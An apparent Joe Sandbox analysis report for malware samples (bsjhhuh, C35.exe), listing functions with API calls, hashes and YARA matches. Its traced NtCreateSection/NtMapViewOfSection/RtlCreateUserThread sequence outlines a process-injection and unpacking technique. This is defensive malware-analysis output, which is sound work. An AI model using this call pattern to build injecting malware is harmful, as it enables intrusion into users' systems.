Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 006C003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006C024D

Strings

cess, xrefs: 006C018D
kernel32.dll, xrefs: 006C008F, 006C0095

Memory Dump Source

Source File: 00000005.00000002.2024197978.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_bsjhhuh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: a16ad12f4b347be2b0c0f4aa935509a1366d3d88948981c0025655a100cedf30
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: F4525874A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB351DB30AE95DF14

Function 00419CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00515FF0), ref: 00419D9F
GetProcAddress.KERNEL32(00000000,00420518), ref: 00419DDC
VirtualProtect.KERNELBASE(00515E34,00515FEC,00000040,?), ref: 00419DFB

Strings

, xrefs: 00419D05

Memory Dump Source

Source File: 00000005.00000002.2023966601.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_bsjhhuh.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
Instruction ID: 9b101dc19ab9e509907a73f40bd9e615ad2773d8f65bdac5e4741cefec9585ad
Opcode Fuzzy Hash: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
Instruction Fuzzy Hash: 273164516187C4EAE311CB64FC087523AA2AF79704F448069A148877B3E7BE065ADB6E

Function 006F0BBE Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006F0BE6
Module32First.KERNEL32(00000000,00000224), ref: 006F0C06

Memory Dump Source

Source File: 00000005.00000002.2024314586.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ed000_bsjhhuh.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: b5840d7d0befb26be5f506f1671e3799b0082ddb7fde98c1e0496460662b33dc
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: CEF0C2352003186FE7202BF49C8CBBEB2EEAF48329F100268E753921C1CA71EC458A60

Function 006C0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,006C0223,?,?), ref: 006C0E19
SetErrorMode.KERNELBASE(00000000,?,?,006C0223,?,?), ref: 006C0E1E

Memory Dump Source

Source File: 00000005.00000002.2024197978.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_bsjhhuh.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4685c5a770edda50dbe0b2dc837f552568978304271461a35dbeccacd63f79b3
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 97D01231145129B7D7003A94DC0DBDD7B1CDF09B62F008411FB0DD9180C770994046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 006F087D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006F08CE

Memory Dump Source

Source File: 00000005.00000002.2024314586.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ed000_bsjhhuh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: b47846a8642f071178ea63709cd58429334002dfc4099a253824170d11bcb896
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: A2113C79A00208EFDB01DF98C985E99BBF5AF08351F058094FA489B362E371EA50DF80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00419C90 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,00515FEC,0041A29B), ref: 00419C98

Memory Dump Source

Source File: 00000005.00000002.2023966601.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_bsjhhuh.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
Instruction ID: cdbbb9e7b83af8b631a1fc3647d71b0b27ee278e0583f88c42ef53277000976a
Opcode Fuzzy Hash: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
Instruction Fuzzy Hash: 26B092B8502600DBD2408B60EC48F953A68E398202F009260FA0085160E7700805AA10

Non-executed Functions

Function 00419F20 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00419F54
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00419F6F
HeapDestroy.KERNEL32(00000000), ref: 00419F8E
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00419F9D

Memory Dump Source

Source File: 00000005.00000002.2023966601.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_bsjhhuh.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
Instruction ID: 1bf496f261d44d5874548456f00747c7bc808a18a7fb14915401555e76d5e561
Opcode Fuzzy Hash: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
Instruction Fuzzy Hash: BF018474600204EBE750EB65EC45BDA77A8E71C316F408076FA0997290DB745D88CB99

Function 00419EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

BuildCommDCBW.KERNEL32(00000000,?), ref: 00419EB4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00419EC6

Strings

-, xrefs: 00419EFF

Memory Dump Source

Source File: 00000005.00000002.2023966601.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_bsjhhuh.jbxd

Similarity

API ID: BuildCommEnvironmentFreeStrings
String ID: -
API String ID: 2991353152-2547889144
Opcode ID: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
Instruction ID: 22d77843ece4753af1e14c452f6c8b6cfa0dc65cd9848c352101f40df5cd50f1
Opcode Fuzzy Hash: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
Instruction Fuzzy Hash: 58F02230908305A6DB20DF98D8907EF7FA5E708322F60022AE840A62C1C7384D86D3AA

Analysis Process: C35.exePID: 1856, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	19.1%
Signature Coverage:	0%
Total number of Nodes:	257
Total number of Limit Nodes:	7

Executed Functions

Function 00419D70 Relevance: 52.8, APIs: 28, Strings: 2, Instructions: 289
filewindowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00419DBF
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00419E53
GetFocus.USER32 ref: 00419E59
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00419E64
FindAtomW.KERNEL32(00000000), ref: 00419E6B
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00419E73
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00419E9A
CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00419EA3
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00419EB9
GetEnvironmentStrings.KERNEL32 ref: 00419EBF
WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00419F04
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00419F13
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00419F1C
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419F31
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00419F42
SetCommState.KERNELBASE(00000000,00000000), ref: 00419F69
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00419F9A
GetComputerNameA.KERNEL32(?,?), ref: 00419FAE
CopyFileW.KERNEL32(0041C3E4,0041C3B8,00000000), ref: 00419FBF
GetFileAttributesA.KERNEL32(00000000), ref: 00419FC6
GetConsoleAliasExesLengthA.KERNEL32 ref: 00419FCC
GetBinaryType.KERNEL32(0041C400,?), ref: 00419FDE
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00419FF1
GetLongPathNameA.KERNEL32(0041C418,?,00000000), ref: 0041A004
GetCommTimeouts.KERNEL32(00000000,00000000), ref: 0041A00C
LoadLibraryA.KERNELBASE(0041C424), ref: 0041A092

Strings

}$, xrefs: 0041A0F5
k`, xrefs: 0041A0CD

Memory Dump Source

Source File: 00000006.00000002.2315244628.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_C35.jbxd

Similarity

API ID: Console$File$CommName$CopyLengthObject$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCreateDefaultEnvironmentExchangeExesFindFocusFormatInformationInterlockedLibraryLoadLongMessageModeModuleOutputPathPipePrivilegeReadSingleStateStringsSystemTimeTimeoutsTypeVolumeWaitWrite
String ID: k`$}$
API String ID: 4249349521-956986773
Opcode ID: 8a0022938582e7786455545f2d2a0aa76fb25a487d10df4c359a7132c8526bce
Instruction ID: 1ffa0da19b14ee91b85dcd2083993de682bc4a00c742463c13e7108b831189b5
Opcode Fuzzy Hash: 8a0022938582e7786455545f2d2a0aa76fb25a487d10df4c359a7132c8526bce
Instruction Fuzzy Hash: AAA19071802524ABD724DB61DC58FDF7B68EF5D311F00816AF609A2161DB381A85CFED

Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C35.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7f1aecd654c101580c33caa0697f0a4eb1be03b42db6f7e8c2cb2cd626b67d0
Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
Opcode Fuzzy Hash: c7f1aecd654c101580c33caa0697f0a4eb1be03b42db6f7e8c2cb2cd626b67d0
Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C35.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 00fdf6c0c0cec7800d010119070486e13fc8524dff54e87bd902aee4aa991197
Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
Opcode Fuzzy Hash: 00fdf6c0c0cec7800d010119070486e13fc8524dff54e87bd902aee4aa991197
Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C35.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 7737ff869299ca3ca4dc99499382bd8f34633e79eedf9272cde4017979e02a10
Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
Opcode Fuzzy Hash: 7737ff869299ca3ca4dc99499382bd8f34633e79eedf9272cde4017979e02a10
Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C35.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: d18b6c02a51361cd05e07a842d3e0aa79c0e363c2c3393af6b77ca0a2f8cc2c4
Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
Opcode Fuzzy Hash: d18b6c02a51361cd05e07a842d3e0aa79c0e363c2c3393af6b77ca0a2f8cc2c4
Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C35.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 17d0a7aae4e5eab7518e2aba78030d0a90555c236ae4342c3ab8b69e33cd9608
Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
Opcode Fuzzy Hash: 17d0a7aae4e5eab7518e2aba78030d0a90555c236ae4342c3ab8b69e33cd9608
Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403177
NtTerminateProcess.NTDLL ref: 00403190

Memory Dump Source

Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C35.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

Function 006B003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006B024D

Strings

kernel32.dll, xrefs: 006B008F, 006B0095
cess, xrefs: 006B018D

Memory Dump Source

Source File: 00000006.00000002.2315529494.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6b0000_C35.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 1cbfe1bad8ad953d37be5dc3ae992457c84081cda89f7c9b413a08e1e8265b97
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 275279B5A00229DFDB64CF58C984BA9BBB1BF09304F1480E9E50DAB351DB30AE85DF14

Function 00419A70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00515FF0), ref: 00419B4F
GetProcAddress.KERNEL32(00000000,00420518), ref: 00419B8C
VirtualProtect.KERNELBASE(00515E34,00515FEC,00000040,?), ref: 00419BAB

Strings

, xrefs: 00419AB5

Memory Dump Source

Source File: 00000006.00000002.2315244628.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

